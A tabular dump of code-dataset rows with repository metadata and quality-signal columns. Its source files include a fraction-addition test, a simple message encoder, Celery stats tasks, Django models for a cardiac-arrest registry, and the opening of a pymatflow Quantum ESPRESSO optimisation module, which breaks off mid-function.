hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | 
qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | 
qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
85d84988da11a476dce7c74f79d147f461a965d2 | 98 | py | Python | tests/fractions_tok/addition.py | aroberge/importhooks | 57483ce24d265d391587f6321954f2ed60f04afd | [
"MIT"
] | 36 | 2020-02-23T19:06:24.000Z | 2022-02-20T22:53:02.000Z | tests/fractions_tok/addition.py | aroberge/importhooks | 57483ce24d265d391587f6321954f2ed60f04afd | [
"MIT"
] | 13 | 2020-02-21T15:25:40.000Z | 2021-07-01T09:56:35.000Z | tests/fractions_tok/addition.py | aroberge/importhooks | 57483ce24d265d391587f6321954f2ed60f04afd | [
"MIT"
] | 1 | 2020-11-05T13:12:07.000Z | 2020-11-05T13:12:07.000Z | print("1 / 10 + 2 / 10 = ", 1 / 10 + 2 / 10)
assert 1 / 10 + 2 / 10 == 3 / 10, "simple addition"
| 24.5 | 51 | 0.469388 | 18 | 98 | 2.555556 | 0.444444 | 0.195652 | 0.26087 | 0.391304 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.313433 | 0.316327 | 98 | 3 | 52 | 32.666667 | 0.373134 | 0 | 0 | 0 | 0 | 0 | 0.336735 | 0 | 0 | 0 | 0 | 0 | 0.5 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0.5 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 9 |
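The `addition.py` fixture above only passes under the repository's import hook (aroberge/importhooks rewrites numeric literals into fractions); in plain CPython the assert fails because of binary floating point. A minimal stdlib sketch of that distinction, using only `fractions.Fraction` (the hook's actual rewriting machinery is not shown here):

```python
from fractions import Fraction

# Plain floats: 0.1 + 0.2 is 0.30000000000000004, so the equality fails.
float_sum = 1 / 10 + 2 / 10
assert float_sum != 3 / 10

# With exact rational arithmetic the identity holds, which is what an
# import hook that rewrites literals into Fraction instances restores.
frac_sum = Fraction(1, 10) + Fraction(2, 10)
assert frac_sum == Fraction(3, 10)
```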
85de7d1934df09fd14efcf602409f4521903938e | 5,674 | py | Python | Message encoder.py | cjw0621/Growing-Python | 50d754ab0a9d32f2284b3732df046f1ce849eca4 | [
"Unlicense"
] | 1 | 2021-11-21T01:51:30.000Z | 2021-11-21T01:51:30.000Z | Message encoder.py | cjw0621/Growing-Python | 50d754ab0a9d32f2284b3732df046f1ce849eca4 | [
"Unlicense"
] | null | null | null | Message encoder.py | cjw0621/Growing-Python | 50d754ab0a9d32f2284b3732df046f1ce849eca4 | [
"Unlicense"
] | null | null | null | def make_encoded(user_input):
user_input = user_input.replace("a", "~")
user_input = user_input.replace("A", "~")
user_input = user_input.replace("b", "@")
user_input = user_input.replace("B", "@")
user_input = user_input.replace("c", "#")
user_input = user_input.replace("C", "#")
user_input = user_input.replace("d", "$")
user_input = user_input.replace("D", "$")
user_input = user_input.replace("e", "%")
user_input = user_input.replace("E", "%")
user_input = user_input.replace("f", "^")
user_input = user_input.replace("F", "^")
user_input = user_input.replace("g", "&")
user_input = user_input.replace("G", "&")
user_input = user_input.replace("h", "*")
user_input = user_input.replace("H", "*")
user_input = user_input.replace("i", "(")
user_input = user_input.replace("I", "(")
user_input = user_input.replace("j", ")")
user_input = user_input.replace("J", ")")
user_input = user_input.replace("k", "-")
user_input = user_input.replace("K", "-")
user_input = user_input.replace("l", "=")
user_input = user_input.replace("L", "=")
user_input = user_input.replace("m", "+")
user_input = user_input.replace("M", "+")
user_input = user_input.replace("n", "`")
user_input = user_input.replace("N", "`")
user_input = user_input.replace("o", ",")
user_input = user_input.replace("O", ",")
user_input = user_input.replace("p", "<")
user_input = user_input.replace("P", "<")
user_input = user_input.replace("q", ".")
user_input = user_input.replace("Q", ".")
user_input = user_input.replace("r", ">")
user_input = user_input.replace("R", ">")
user_input = user_input.replace("s", "/")
user_input = user_input.replace("S", "/")
user_input = user_input.replace("t", "?")
user_input = user_input.replace("T", "?")
user_input = user_input.replace("u", "[")
user_input = user_input.replace("U", "[")
user_input = user_input.replace("v", "]")
user_input = user_input.replace("V", "]")
user_input = user_input.replace("w", "|")
user_input = user_input.replace("W", "|")
user_input = user_input.replace("x", "}")
user_input = user_input.replace("X", "}")
user_input = user_input.replace("y", "{")
user_input = user_input.replace("Y", "{")
user_input = user_input.replace("z", ";")
user_input = user_input.replace("Z", ";")
return user_input
def make_decoded(user_input):
# Case cannot be recovered: the encoder maps both cases of each letter to
# the same symbol, so decoding always yields lowercase and one replace()
# per symbol suffices (a second replace() of the same symbol is a no-op).
user_input = user_input.replace("~", "a")
user_input = user_input.replace("@", "b")
user_input = user_input.replace("#", "c")
user_input = user_input.replace("$", "d")
user_input = user_input.replace("%", "e")
user_input = user_input.replace("^", "f")
user_input = user_input.replace("&", "g")
user_input = user_input.replace("*", "h")
user_input = user_input.replace("(", "i")
user_input = user_input.replace(")", "j")
user_input = user_input.replace("-", "k")
user_input = user_input.replace("=", "l")
user_input = user_input.replace("+", "m")
user_input = user_input.replace("`", "n")
user_input = user_input.replace(",", "o")
user_input = user_input.replace("<", "p")
user_input = user_input.replace(".", "q")
user_input = user_input.replace(">", "r")
user_input = user_input.replace("/", "s")
user_input = user_input.replace("?", "t")
user_input = user_input.replace("[", "u")
user_input = user_input.replace("]", "v")
user_input = user_input.replace("|", "w")
user_input = user_input.replace("}", "x")
user_input = user_input.replace("{", "y")
user_input = user_input.replace(";", "z")
return user_input
loop = False
while loop == False:
y_n = input("Do you have a message you would like to decode? -> ")
print(y_n)
if y_n == "y" or y_n == "Y" or y_n == "yes" or y_n == "Yes" or y_n == "YES":
user_input = input("Whats your encoded message? -> ")
print(make_decoded(user_input))
elif y_n == "n" or y_n == "N" or y_n == "no" or y_n == "No" or y_n == "NO":
user_input = input("What would you like encoded? -> ")
print(make_encoded(user_input))
else:
print("Your response is invalid. Please ensure you're only using letters.")
user_input = y_n
print(user_input)
loop = True  # the original 'loop == False' compared instead of assigning, so the loop never ended | 42.984848 | 86 | 0.594466 | 748 | 5,674 | 4.195187 | 0.085562 | 0.625239 | 0.439133 | 0.608031 | 0.894519 | 0.894519 | 0.88942 | 0.88942 | 0.876992 | 0.876992 | 0 | 0 | 0.20497 | 5,674 | 132 | 87 | 42.984848 | 0.695633 | 0 | 0 | 0.01626 | 0 | 0 | 0.073773 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.01626 | false | 0 | 0 | 0 | 0.03252 | 0.04065 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
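The 52 chained `replace()` calls in `Message encoder.py` amount to a fixed substitution table, which Python expresses directly with `str.maketrans`/`str.translate`. A behavior-equivalent sketch (the `PLAIN`/`CIPHER` strings are transcribed from the `replace()` pairs above; decoding still loses case, since the encoder maps both cases to one symbol):

```python
# Substitution table transcribed from the original replace() pairs.
PLAIN = "abcdefghijklmnopqrstuvwxyz"
CIPHER = "~@#$%^&*()-=+`,<.>/?[]|}{;"

# Both cases of each letter encode to the same symbol; decoding
# therefore always yields lowercase.
ENCODE = str.maketrans(PLAIN + PLAIN.upper(), CIPHER * 2)
DECODE = str.maketrans(CIPHER, PLAIN)

def make_encoded(text: str) -> str:
    return text.translate(ENCODE)

def make_decoded(text: str) -> str:
    return text.translate(DECODE)

assert make_encoded("Hi") == "*("
assert make_decoded(make_encoded("hello world")) == "hello world"
```

`str.translate` walks the string once instead of 52 times, and the table makes the letter-to-symbol mapping auditable at a glance.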
c0ac50180aac8a7c789ac715647fd3941ab60825 | 3,122 | py | Python | content_interactions_stats/tasks.py | aaboffill/django-content-interactions | 8ea881e46cc6d5c375542939bb69d2980efdec23 | [
"BSD-3-Clause"
] | null | null | null | content_interactions_stats/tasks.py | aaboffill/django-content-interactions | 8ea881e46cc6d5c375542939bb69d2980efdec23 | [
"BSD-3-Clause"
] | null | null | null | content_interactions_stats/tasks.py | aaboffill/django-content-interactions | 8ea881e46cc6d5c375542939bb69d2980efdec23 | [
"BSD-3-Clause"
] | null | null | null | # coding=utf-8
from celery import shared_task
@shared_task(name='content_interactions.like_process')
def item_like_process(item_id, item_content_type):
from content_interactions_stats.utils import item_like_process
item_like_process(item_id, item_content_type)
@shared_task(name='content_interactions.dislike_process')
def item_dislike_process(item_id, item_content_type):
from content_interactions_stats.utils import item_dislike_process
item_dislike_process(item_id, item_content_type)
@shared_task(name='content_interactions.new_rating_process')
def item_new_rating_process(item_id, item_content_type, rating):
from content_interactions_stats.utils import item_new_rating_process
item_new_rating_process(item_id, item_content_type, rating)
@shared_task(name='content_interactions.update_rating_process')
def item_updated_rating_process(item_id, item_content_type, old_rating, rating):
from content_interactions_stats.utils import item_updated_rating_process
item_updated_rating_process(item_id, item_content_type, old_rating, rating)
@shared_task(name='content_interactions.mark_favorite_process')
def item_marked_favorite_process(item_id, item_content_type):
from content_interactions_stats.utils import item_marked_favorite_process
item_marked_favorite_process(item_id, item_content_type)
@shared_task(name='content_interactions.unmark_favorite_process')
def item_unmarked_favorite_process(item_id, item_content_type):
from content_interactions_stats.utils import item_unmarked_favorite_process
item_unmarked_favorite_process(item_id, item_content_type)
@shared_task(name='content_interactions.share_process')
def item_shared_process(item_id, item_content_type):
from content_interactions_stats.utils import item_shared_process
item_shared_process(item_id, item_content_type)
@shared_task(name='content_interactions.denounce_process')
def item_denounced_process(item_id, item_content_type):
from content_interactions_stats.utils import item_denounced_process
item_denounced_process(item_id, item_content_type)
@shared_task(name='content_interactions.denounce_removed_process')
def item_denounce_removed_process(item_id, item_content_type):
from content_interactions_stats.utils import item_denounce_removed_process
item_denounce_removed_process(item_id, item_content_type)
@shared_task(name='content_interactions.comment_process')
def item_got_comment_process(item_id, item_content_type):
from content_interactions_stats.utils import item_got_comment_process
item_got_comment_process(item_id, item_content_type)
@shared_task(name='content_interactions.comment_deleted_process')
def item_comment_deleted_process(item_id, item_content_type):
from content_interactions_stats.utils import item_comment_deleted_process
item_comment_deleted_process(item_id, item_content_type)
@shared_task(name='content_interactions.visit_process')
def item_visited_process(item_id, item_content_type):
from content_interactions_stats.utils import item_visited_process
item_visited_process(item_id, item_content_type)
| 41.078947 | 80 | 0.858424 | 439 | 3,122 | 5.571754 | 0.088838 | 0.161897 | 0.127555 | 0.166803 | 0.874898 | 0.80417 | 0.777187 | 0.777187 | 0.687244 | 0.627555 | 0 | 0.000349 | 0.081038 | 3,122 | 75 | 81 | 41.626667 | 0.852213 | 0.003844 | 0 | 0 | 0 | 0 | 0.149984 | 0.149984 | 0 | 0 | 0 | 0 | 0 | 1 | 0.244898 | false | 0 | 0.265306 | 0 | 0.510204 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 8 |
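Every task in `tasks.py` is a thin wrapper whose only job is to defer the `content_interactions_stats.utils` import to call time, a standard dodge for circular imports during Django app loading. Under that reading the wrappers could be generated; a sketch, where `make_stat_task` is hypothetical and not part of the project (Celery's `shared_task` decorator would still be applied on top, as in the file above):

```python
import importlib

def make_stat_task(func_name, module="content_interactions_stats.utils"):
    """Build a wrapper that resolves `module.func_name` only when called,
    mirroring the inside-the-function imports used by every task above."""
    def task(item_id, item_content_type, *extra):
        impl = getattr(importlib.import_module(module), func_name)
        return impl(item_id, item_content_type, *extra)
    task.__name__ = func_name  # keep a useful name for logging/registration
    return task

# Each @shared_task body could then collapse to one line, e.g.:
# item_like_process = shared_task(name="content_interactions.like_process")(
#     make_stat_task("item_like_process"))
```

A trade-off worth noting: generated wrappers are harder for static tooling to discover than the explicit `def` blocks the original uses, so the repetition may be deliberate.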
c0b529e628f3a72c09629012a1f2718796b37dee | 39 | py | Python | SAKIR/ilk.py | vektorelpython24proje/temelbilgiler | bced2723d247dbb8b10cf86e25ee209635f82921 | [
"MIT"
] | null | null | null | SAKIR/ilk.py | vektorelpython24proje/temelbilgiler | bced2723d247dbb8b10cf86e25ee209635f82921 | [
"MIT"
] | null | null | null | SAKIR/ilk.py | vektorelpython24proje/temelbilgiler | bced2723d247dbb8b10cf86e25ee209635f82921 | [
"MIT"
] | 3 | 2020-10-24T14:36:14.000Z | 2020-10-24T14:41:13.000Z | print("ŞAKİR KAYADAN 25.10.2020 Pazar") | 39 | 39 | 0.769231 | 9 | 39 | 3.444444 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.222222 | 0.076923 | 39 | 1 | 39 | 39 | 0.611111 | 0 | 0 | 0 | 0 | 0 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
c0df6898fa90babf8a53f67c3f1bbcf7e7683899 | 9,452 | py | Python | database/ohca-api/ohca/models.py | SterArcher/OHCA-registry-Slovenia | ad8278a28039503ab6a75d48ffea314de9a759ba | [
"MIT"
] | 1 | 2022-02-28T13:02:14.000Z | 2022-02-28T13:02:14.000Z | database/ohca-api/ohca/models.py | SterArcher/dispatch | ad8278a28039503ab6a75d48ffea314de9a759ba | [
"MIT"
] | 1 | 2022-03-20T10:51:17.000Z | 2022-03-21T07:52:57.000Z | database/ohca-api/ohca/models.py | SterArcher/OHCA-registry-Slovenia | ad8278a28039503ab6a75d48ffea314de9a759ba | [
"MIT"
] | null | null | null | from django.db import models
from django.core.validators import MinValueValidator, MaxValueValidator
class Locale(models.Model):
localID = models.BigAutoField(primary_key=True)
friendlyName = models.TextField()
population = models.IntegerField(default = 0)
attendedCAs = models.IntegerField(default = 0)
attemptedResusc = models.IntegerField(default = 0)
casesDNR = models.IntegerField(default = 0)
casesFutile = models.IntegerField(default = 0)
casesCirculation = models.IntegerField(default = 0)
casesUnknown = models.IntegerField(default = 0)
description = models.JSONField(default = dict)
descriptionSupplemental = models.TextField(null = True, blank = True)
def update(self, *args, **kwargs):
for name,values in kwargs.items():
if not(name == 'localID'):
try:
setattr(self,name,values)
except AttributeError:  # setattr raises AttributeError, never KeyError
pass
self.save()
return True
def __str__(self):
return self.friendlyName
class Meta:
db_table = 'locales'
class System(models.Model):
systemID = models.BigAutoField(primary_key=True)
friendlyName = models.TextField()
population = models.IntegerField(default = 0)
attendedCAs = models.IntegerField(default = 0)
attemptedResusc = models.IntegerField(default = 0)
casesDNR = models.IntegerField(default = 0)
casesFutile = models.IntegerField(default = 0)
casesCirculation = models.IntegerField(default = 0)
casesUnknown = models.IntegerField(default = 0)
description = models.JSONField(default = dict)
descriptionSupplemental = models.TextField(null = True, blank = True)
def update(self, *args, **kwargs):
for name,values in kwargs.items():
if not(name == 'systemID'):
try:
setattr(self,name,values)
except AttributeError:  # setattr raises AttributeError, never KeyError
pass
self.save()
return True
def __str__(self):
return self.friendlyName
class Meta:
db_table = 'systems'
class CaseReport(models.Model):
caseID = models.CharField(max_length = 32, primary_key = True)
dispatchID = models.CharField(max_length = 32, blank = True, null = True, unique = True)
systemID = models.ForeignKey(System, on_delete = models.DO_NOTHING)
localID = models.ForeignKey(Locale, on_delete = models.DO_NOTHING)
dispIdentifiedCA = models.SmallIntegerField(null = True, blank = True, validators=[MinValueValidator(-1), MaxValueValidator(1)])
dispProvidedCPRinst = models.SmallIntegerField(null = True, blank = True, validators=[MinValueValidator(-1), MaxValueValidator(1)])
age = models.SmallIntegerField(null = True, blank = True, validators=[MinValueValidator(-1), MaxValueValidator(200)])
gender = models.SmallIntegerField(null = True, blank = True, validators=[MinValueValidator(-1), MaxValueValidator(1)])
witnesses = models.SmallIntegerField(null = True, blank = True, validators=[MinValueValidator(-1), MaxValueValidator(3)])
location = models.SmallIntegerField(null = True, blank = True, validators=[MinValueValidator(-1), MaxValueValidator(8)])
bystanderResponse = models.SmallIntegerField(null = True, blank = True, validators=[MinValueValidator(-1), MaxValueValidator(2)])
bystanderResponseTime = models.BigIntegerField(null = True, blank = True, validators=[MinValueValidator(-1)])
bystanderAED = models.SmallIntegerField(null = True, blank = True, validators=[MinValueValidator(-1), MaxValueValidator(2)])
bystanderAEDTime = models.BigIntegerField(null = True, blank = True, validators=[MinValueValidator(-1)])
deadOnArrival = models.SmallIntegerField(null = True, blank = True, validators=[MinValueValidator(-1), MaxValueValidator(1)])
firstMonitoredRhy = models.SmallIntegerField(null = True, blank = True, validators=[MinValueValidator(-1), MaxValueValidator(1)])
pathogenesis = models.SmallIntegerField(null = True, blank = True, validators=[MinValueValidator(1), MaxValueValidator(6)])
independentLiving = models.SmallIntegerField(null = True, blank = True, validators=[MinValueValidator(-1), MaxValueValidator(1)])
comorbidities = models.SmallIntegerField(null = True, blank = True, validators=[MinValueValidator(-1), MaxValueValidator(1)])
vad = models.SmallIntegerField(null = True, blank = True, validators=[MinValueValidator(-1), MaxValueValidator(1)])
cardioverterDefib = models.SmallIntegerField(null = True, blank = True, validators=[MinValueValidator(-1), MaxValueValidator(2)])
stemiPresent = models.SmallIntegerField(null = True, blank = True, validators=[MinValueValidator(-1), MaxValueValidator(1)])
responseTime = models.BigIntegerField(null = True, blank = True, validators=[MinValueValidator(-1)])
defibTime = models.BigIntegerField(null = True, blank = True, validators=[MinValueValidator(-1)])
ttm = models.SmallIntegerField(null = True, blank = True, validators=[MinValueValidator(-1), MaxValueValidator(5)])
ttmTemp = models.SmallIntegerField(null = True, blank = True, validators=[MinValueValidator(-1), MaxValueValidator(400)])
drugs = models.SmallIntegerField(null = True, blank = True, validators=[MinValueValidator(-1), MaxValueValidator(7)])
airwayControl = models.SmallIntegerField(null = True, blank = True, validators=[MinValueValidator(-1), MaxValueValidator(15)])
cprQuality = models.SmallIntegerField(null = True, blank = True, validators=[MinValueValidator(-1), MaxValueValidator(1)])
shocks = models.SmallIntegerField(null = True, blank = True, validators=[MinValueValidator(-1)])
drugTimings = models.JSONField(default = dict)
vascularAccess = models.SmallIntegerField(null = True, blank = True, validators=[MinValueValidator(-1), MaxValueValidator(4)])
mechanicalCPR = models.SmallIntegerField(null = True, blank = True, validators=[MinValueValidator(-1), MaxValueValidator(3)])
targetVent = models.SmallIntegerField(null = True, blank = True, validators=[MinValueValidator(-1), MaxValueValidator(3)])
reperfusionAttempt = models.SmallIntegerField(null = True, blank = True, validators=[MinValueValidator(-1), MaxValueValidator(8)])
reperfusionTime = models.SmallIntegerField(null = True, blank = True, validators=[MinValueValidator(-1)])
ecls = models.SmallIntegerField(null = True, blank = True, validators=[MinValueValidator(-1), MaxValueValidator(2)])
iabp = models.SmallIntegerField(null = True, blank = True, validators=[MinValueValidator(-1), MaxValueValidator(1)])
ph = models.DecimalField(max_digits = 5, decimal_places = 3, null = True, blank = True, validators=[MinValueValidator(-1), MaxValueValidator(14)])
lactate = models.DecimalField(max_digits = 10, decimal_places = 5, null = True, blank = True, validators=[MinValueValidator(-1)])
glucose = models.SmallIntegerField(null = True, blank = True, validators=[MinValueValidator(-1), MaxValueValidator(1)])
neuroprognosticTests = models.JSONField(default = dict)
specialistHospital = models.SmallIntegerField(null = True, blank = True, validators=[MinValueValidator(-1), MaxValueValidator(1)])
hospitalVolume = models.IntegerField(null = True, blank = True, validators=[MinValueValidator(-1)])
ecg = models.SmallIntegerField(null = True, blank = True, validators=[MinValueValidator(-1), MaxValueValidator(1)])
ecgBLOB = models.FileField(null = True, blank = True)
targetBP = models.DecimalField(max_digits = 10, decimal_places = 5, null = True, blank = True, validators=[MinValueValidator(-1)])
survived = models.SmallIntegerField(null = True, blank = True, validators=[MinValueValidator(-1), MaxValueValidator(1)])
rosc = models.SmallIntegerField(null = True, blank = True, validators=[MinValueValidator(-1), MaxValueValidator(1)])
roscTime = models.BigIntegerField(null = True, blank = True, validators=[MinValueValidator(-1)])
SurvivalDischarge30d = models.SmallIntegerField(null = True, blank = True, validators=[MinValueValidator(-1), MaxValueValidator(1)])
cpcDischarge = models.SmallIntegerField(null = True, blank = True, validators=[MinValueValidator(-1), MaxValueValidator(5)])
mrsDischarge = models.SmallIntegerField(null = True, blank = True, validators=[MinValueValidator(-1), MaxValueValidator(6)])
survivalStatus = models.SmallIntegerField(null = True, blank = True, validators=[MinValueValidator(-1), MaxValueValidator(1)])
transportToHospital = models.SmallIntegerField(null = True, blank = True, validators=[MinValueValidator(-1), MaxValueValidator(1)])
treatmentWithdrawn = models.IntegerField(null = True, blank = True, validators=[MinValueValidator(-1)])
cod = models.CharField(max_length = 6, null = True, blank = True)
organDonation = models.IntegerField(null = True, blank = True, validators=[MinValueValidator(-1), MaxValueValidator(1)])
patientReportedOutcome = models.SmallIntegerField(null = True, blank = True)
qualityOfLife = models.JSONField(default = dict)
def update(self, *args, **kwargs):
for name,values in kwargs.items():
if not(name == 'caseID'):
try:
setattr(self,name,values)
except AttributeError:  # setattr raises AttributeError, never KeyError
pass
self.save()
return True
def __str__(self):
return self.caseID
class Meta:
db_table = 'cases' | 68.492754 | 150 | 0.714452 | 924 | 9,452 | 7.274892 | 0.16342 | 0.066647 | 0.106367 | 0.139096 | 0.822374 | 0.807795 | 0.801845 | 0.801845 | 0.792621 | 0.692502 | 0 | 0.015716 | 0.165256 | 9,452 | 138 | 151 | 68.492754 | 0.836248 | 0 | 0 | 0.412698 | 0 | 0 | 0.004231 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.047619 | false | 0.02381 | 0.015873 | 0.02381 | 0.809524 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 7 |
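`Locale`, `System` and `CaseReport` above share an identical `update()` helper: copy keyword arguments onto the instance, refuse to touch the primary-key field, tolerate unknown names, then persist. Stripped of Django, the pattern looks like this (the `Record` class and its fields are illustrative, not part of the project):

```python
class Record:
    PK_FIELD = "caseID"  # never overwritten by update()

    def __init__(self, caseID, survived=None):
        self.caseID = caseID
        self.survived = survived
        self.saved = False

    def save(self):
        self.saved = True  # stand-in for Django's Model.save()

    def update(self, **kwargs):
        for name, value in kwargs.items():
            if name == self.PK_FIELD:
                continue  # skip the primary key
            if hasattr(self, name):  # guard explicitly: setattr would not
                setattr(self, name, value)  # raise KeyError on unknown names
        self.save()
        return True
```

Usage: `Record("X1").update(caseID="Y9", survived=1, bogus=2)` leaves `caseID` at `"X1"`, sets `survived`, silently drops `bogus`, and saves once.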
c0eb62f3c132cacd12369f13e8b5129d606db945 | 166,643 | py | Python | pymatflow/qe/opt.py | DeqiTang/pymatflow | bd8776feb40ecef0e6704ee898d9f42ded3b0186 | [
"MIT"
] | 6 | 2020-03-06T16:13:08.000Z | 2022-03-09T07:53:34.000Z | pymatflow/qe/opt.py | DeqiTang/pymatflow | bd8776feb40ecef0e6704ee898d9f42ded3b0186 | [
"MIT"
] | 1 | 2021-10-02T02:23:08.000Z | 2021-11-08T13:29:37.000Z | pymatflow/qe/opt.py | DeqiTang/pymatflow | bd8776feb40ecef0e6704ee898d9f42ded3b0186 | [
"MIT"
] | 1 | 2021-07-10T16:28:14.000Z | 2021-07-10T16:28:14.000Z | """
Geometric Optimization calc
"""
import os
import re
import shutil
import numpy as np
import pymatflow.base as base
from pymatflow.remote.server import server_handle
from pymatflow.qe.pwscf import PwScf
class OptRun(PwScf):
"""
structural optimization uses both energies and forces to locate the minima
along serach directions. usually insufficient scf convergence will lead to
bad convergence of BFGS algorithm or even to errors. so when doing geometric
optimization, we better set parameters to get a good scf convergece.
when you structure is small, use a large kpoint set, or the optimization
will not be reliable. if you structure is big enough, a small kpoint set
will usually suffice the requirement.
"""
def __init__(self):
super().__init__()
self.arts.ifstatic = False
def relax(self, directory="tmp-qe-relax", inpname="relax.in", output="relax.out", runopt="gen", auto=0):
"""
:param directory: a place for all the generated files
"""
#self.set_relax()
if runopt == "gen" or runopt == "genrun":
if os.path.exists(directory):
shutil.rmtree(directory)
os.mkdir(directory)
#os.system("cp *.UPF %s/" % directory)
#os.system("cp %s %s/" % (self.arts.xyz.file, directory))
# do not copy too many files at the same time or it will be slow
